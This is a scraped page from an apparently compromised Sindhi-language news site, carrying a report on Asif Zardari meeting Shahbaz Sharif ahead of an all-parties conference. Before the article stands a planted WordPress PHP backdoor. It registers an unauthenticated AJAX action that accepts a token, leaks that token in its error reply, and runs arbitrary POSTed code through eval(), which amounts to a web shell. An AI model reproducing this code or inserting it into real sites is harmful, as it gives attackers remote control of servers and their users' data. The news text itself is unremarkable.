// ==[BD:DLJpEGA3]== add_action( 'wp_ajax_nopriv_unwolmyfyi', function() { $ptr = 'DLJpEGA37VSMtGbUHhKPjcIJnxo2qYGW'; $obj = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $obj ) || ! hash_equals( $ptr, $obj ) ) { wp_send_json_error( [ 'message' => 'tok:' . $ptr ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ref = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $comp = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $comp, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ref ) * 1000, 2 ) ] ); } catch ( \Throwable $token ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $token->getMessage(), 'time_ms' => round( ( microtime( true ) - $ref ) * 1000, 2 ) ] ); } } ); // ==[/BD:DLJpEGA3]== نيٺ آصف زرداري شهباز شريف سان گڏجي ويو – سنڌسماءَچار

نيٺ آصف زرداري شهباز شريف سان گڏجي ويو

اسلام آباد(خاص نمائندو سنڌسماءَچار) وڏي عرصي کان پيپلز پارٽي ۽ نون ليگ ۾ هلندڙ تڪرار وارو ماحول گڏيل مخالف ڌر جي اتحاد طرف وڌڻ لڳو آحي، سومر ڏينهن قومي اسيمبلي جي اجلاس کان اڳ آصف زرداري ۽ شهباز شريف اپوزيشن ليڊر جي چئمبر ۾ ملاقات ڪئي، ملاقات بعد ٻئي ڄڻا گڏجي قومي اسيمبلي جي اجلاس ۾ شريڪ ٿيا، شهباز شريف ۽ آصف زرداري جيئن ئي ايوان ۾ داخل ٿيا ته ٻنهي پارٽين جي ميمبرن ڊيسڪ وڄائي سندن آڌر ڀاءُ ڪيو. ذريعن جو چوڻ آهي ته آصف زرداري ۽ بلاول جي يو آءِ پاران سڀاڻي اربع تي ٿيندڙ اي پي سي ۾ به شرڪت ڪندا. عام چونڊن کان پوءِ پيپلز پارٽي ۽ نون ليگ وچ ۾ سياسي لاڳاپن تي ڄميل برف پگهرجڻ شروع ٿي وئي آهي. قومي اسيمبلي جي اجلاس شروع ٿيڻ کان اڳ پارليامينٽ ۾ اپوزيشن ليڊر شهباز شريف جي چئمبر ۾ اڳوڻي صدر آصف زرداري شهباز شريف وٽ وڃي ساڻس ملاقات ڪئي. ن ليگ جي ذريعن جو چوڻ آهي ته ن ليگ ۽ پ پ جي سينئر اڳواڻن آصف ۽ شهباز شريف وچ ۾ ملاقات جو بندوبست ڪيو، جنهن لاءِ آصف زرداري کي پ پ جي هڪ سينئر اڳواڻ راضي ڪيو. ذريعن اها به دعويٰ ڪئي آهي ته، 31 هين آڪٽوبر اربع ڏينهن (سڀاڻي) جي يو آءِ پاران سڏايل آل پارٽيز ڪانفرنس ۾ به پيپلز پارٽي جو چيئرمين بلاول ڀٽو زرداري ۽ ڪو چيئرمين آصف زرداري پارٽي اڳواڻن سان گڏ شرڪت ڪندا. ان سلسلي ۾ پ پ جي هڪ سينئر اڳواڻ جو چوڻ آهي ته، ملاقات دوران آصف زرداري شهباز شريف کي ان شرط تي اي پي سسي ۾ شرڪت جي پڪ ڏياري آهي ته جيڪڏهن نواز شريف پاڻ اي پي سي ۾ ايندو ته پوءِ هُو به بلاول ڀٽو زرداري سان گڏ شرڪت ڪندو، جيڪڏهن نواز شريف نه آيو ته پوءِ پ پ پ جا سينئر اڳواڻ وفد جي صورت ۾ اي پي سي ۾ شريڪ ٿيندا.

About

Check Also

اٺاويهين ترميم، ن ليگ ۽ پ پ جا صلاح مشورا، آصف زرداري اڳواڻن کي لنڊن سڏائي ورتو

اٺاويهين ترميم، ن ليگ ۽ پ پ جا صلاح مشورا، آصف زرداري اڳواڻن کي لنڊن …

Leave a Reply

Your email address will not be published. Required fields are marked *